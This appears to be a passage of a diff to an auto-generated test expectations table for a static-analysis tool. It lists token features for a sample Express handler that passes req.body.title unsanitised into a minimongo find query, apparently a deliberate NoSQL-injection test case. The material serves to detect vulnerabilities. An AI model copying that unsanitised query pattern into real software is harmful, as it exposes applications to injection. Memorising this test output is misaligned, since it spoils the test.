contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:6:12:6:18 | LocalDb | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:3:7:5 | doc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:3:7:5 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:3:7:5 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:3:7:5 | doc | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:3:7:17 | doc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:3:7:17 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:3:7:17 | doc | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:3:7:17 | doc = db.myDocs | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:3:7:17 | doc = db.myDocs | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:3:7:17 | doc = db.myDocs | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:9:7:10 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:9:7:10 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:9:7:10 | db | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:9:7:17 | db.myDocs | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:9:7:17 | db.myDocs | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:9:7:17 | db.myDocs | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:12:7:17 | myDocs | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:12:7:17 | myDocs | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:7:12:7:17 | myDocs | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:9:7:9:9 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:9:7:9:9 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:9:7:9:9 | app | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:9:7:9:21 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:9:7:9:21 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:9:7:9:21 | app | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:9:7:9:21 | app = express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:9:7:9:21 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:9:7:9:21 | app = express() | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:9:13:9:19 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:9:13:9:19 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:9:13:9:19 | express | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:9:13:9:21 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:9:13:9:21 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:9:13:9:21 | exceptional return of express() | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:9:13:9:21 | express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:9:13:9:21 | express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:9:13:9:21 | express() | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:1:11:3 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:1:11:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:1:11:3 | app | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:1:11:7 | app.use | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:1:11:7 | app.use | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:1:11:7 | app.use | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:1:11:50 | app.use ... rue })) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:1:11:50 | app.use ... rue })) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:1:11:50 | app.use ... rue })) | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:1:11:50 | exceptional return of app.use ... rue })) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:1:11:50 | exceptional return of app.use ... rue })) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:1:11:50 | exceptional return of app.use ... rue })) | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:5:11:7 | use | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:5:11:7 | use | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:5:11:7 | use | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:9:11:18 | bodyParser | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:9:11:18 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:9:11:18 | bodyParser | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:9:11:29 | bodyPar ... encoded | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:9:11:29 | bodyPar ... encoded | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:9:11:29 | bodyPar ... encoded | fileImports | body-parser express minimongo | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:9:11:49 | bodyPar ... true }) | CalleeFlexibleAccessPath | app.use | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:9:11:49 | bodyPar ... true }) | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:9:11:49 | bodyPar ... true }) | calleeImports | express | @@ -1389,6 +7508,12 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:9:11:49 | bodyPar ... true }) | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:9:11:49 | bodyPar ... true }) | fileImports | body-parser express minimongo | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:9:11:49 | bodyPar ... true }) | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:9:11:49 | exceptional return of bodyPar ... true }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:9:11:49 | exceptional return of bodyPar ... true }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:9:11:49 | exceptional return of bodyPar ... true }) | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:20:11:29 | urlencoded | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:20:11:29 | urlencoded | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:20:11:29 | urlencoded | fileImports | body-parser express minimongo | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:31:11:48 | { extended: true } | CalleeFlexibleAccessPath | bodyParser.urlencoded | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:31:11:48 | { extended: true } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:31:11:48 | { extended: true } | calleeImports | body-parser | @@ -1396,6 +7521,15 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:31:11:48 | { extended: true } | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:31:11:48 | { extended: true } | fileImports | body-parser express minimongo | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:31:11:48 | { extended: true } | receiverName | bodyParser | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:33:11:40 | extended | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:33:11:40 | extended | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:33:11:40 | extended | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:33:11:46 | extended: true | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:33:11:46 | extended: true | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:33:11:46 | extended: true | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:33:11:46 | extended: true | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:33:11:46 | extended: true | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:33:11:46 | extended: true | fileImports | body-parser express minimongo | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:43:11:46 | true | CalleeFlexibleAccessPath | bodyParser.urlencoded | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:43:11:46 | true | InputAccessPathFromCallee | 0.extended | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:43:11:46 | true | InputArgumentIndex | 0 | @@ -1404,6 +7538,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:43:11:46 | true | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:43:11:46 | true | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:11:43:11:46 | true | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:1:13:3 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:1:13:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:1:13:3 | app | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:1:13:8 | app.post | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:1:13:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:1:13:8 | app.post | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:1:19:2 | app.pos ... ry);\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:1:19:2 | app.pos ... ry);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:1:19:2 | app.pos ... ry);\\n}) | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:1:19:2 | exceptional return of app.pos ... ry);\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:1:19:2 | exceptional return of app.pos ... ry);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:1:19:2 | exceptional return of app.pos ... ry);\\n}) | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:5:13:8 | post | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:5:13:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:5:13:8 | post | fileImports | body-parser express minimongo | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:10:13:26 | "/documents/find" | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:10:13:26 | "/documents/find" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:10:13:26 | "/documents/find" | calleeImports | express | @@ -1411,6 +7560,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:10:13:26 | "/documents/find" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:10:13:26 | "/documents/find" | fileImports | body-parser express minimongo | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:10:13:26 | "/documents/find" | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:13:28 | doc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:13:28 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:13:28 | doc | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:13:28 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:13:28 | doc | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | 'arguments' object of anonymous function | fileImports | body-parser express minimongo | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | (req, r ... ery);\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | (req, r ... ery);\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | (req, r ... ery);\\n} | calleeImports | express | @@ -1418,11 +7577,122 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | (req, r ... ery);\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | (req, r ... ery);\\n} | fileImports | body-parser express minimongo | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | (req, r ... ery);\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | exceptional return of anonymous function | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | exceptional return of anonymous function | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | return of anonymous function | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:29:19:1 | return of anonymous function | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:30:13:32 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:30:13:32 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:30:13:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:30:13:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:30:13:32 | req | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:30:13:32 | req | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:30:13:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:30:13:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:30:13:32 | req | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:30:13:32 | req | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:35:13:37 | res | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:35:13:37 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:35:13:37 | res | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:35:13:37 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:13:35:13:37 | res | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:9:14:13 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:9:14:13 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:9:14:13 | query | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:9:14:13 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:9:14:13 | query | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:9:14:18 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:9:14:18 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:9:14:18 | query | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:9:14:18 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:9:14:18 | query | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:9:14:18 | query = {} | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:9:14:18 | query = {} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:9:14:18 | query = {} | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:9:14:18 | query = {} | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:9:14:18 | query = {} | fileImports | body-parser express minimongo | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:17:14:18 | {} | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:17:14:18 | {} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:17:14:18 | {} | enclosingFunctionBody | req res query query title req body title doc find query | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:17:14:18 | {} | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:14:17:14:18 | {} | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:3:15:7 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:3:15:7 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:3:15:7 | query | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:3:15:7 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:3:15:7 | query | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:3:15:13 | query.title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:3:15:13 | query.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:3:15:13 | query.title | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:3:15:13 | query.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:3:15:13 | query.title | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:3:15:30 | query.t ... y.title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:3:15:30 | query.t ... y.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:3:15:30 | query.t ... y.title | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:3:15:30 | query.t ... y.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:3:15:30 | query.t ... y.title | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:9:15:13 | title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:9:15:13 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:9:15:13 | title | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:9:15:13 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:9:15:13 | title | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:17:15:19 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:17:15:19 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:17:15:19 | req | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:17:15:19 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:17:15:19 | req | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:17:15:24 | req.body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:17:15:24 | req.body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:17:15:24 | req.body | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:17:15:24 | req.body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:17:15:24 | req.body | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:17:15:30 | req.body.title | assignedToPropName | title | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:17:15:30 | req.body.title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:17:15:30 | req.body.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:17:15:30 | req.body.title | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:17:15:30 | req.body.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:17:15:30 | req.body.title | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:21:15:24 | body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:21:15:24 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:21:15:24 | body | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:21:15:24 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:21:15:24 | body | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:26:15:30 | title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:26:15:30 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:26:15:30 | title | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:26:15:30 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:15:26:15:30 | title | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:5 | doc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:5 | doc | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:5 | doc | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:5 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:5 | doc | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:10 | doc.find | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:10 | doc.find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:10 | doc.find | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:10 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:10 | doc.find | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:17 | doc.find(query) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:17 | doc.find(query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:17 | doc.find(query) | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:17 | doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:17 | doc.find(query) | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:17 | exceptional return of 